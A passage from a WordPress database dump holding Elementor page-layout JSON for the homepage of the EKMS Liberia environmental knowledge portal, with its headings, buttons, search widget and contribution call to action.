Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6095,550,'_elementor_version','2.7.5'),(6096,550,'_elementor_template_type','wp-page'),(6097,550,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6099,551,'_wp_page_template','default'),(6100,551,'_elementor_edit_mode','builder'),(6101,551,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 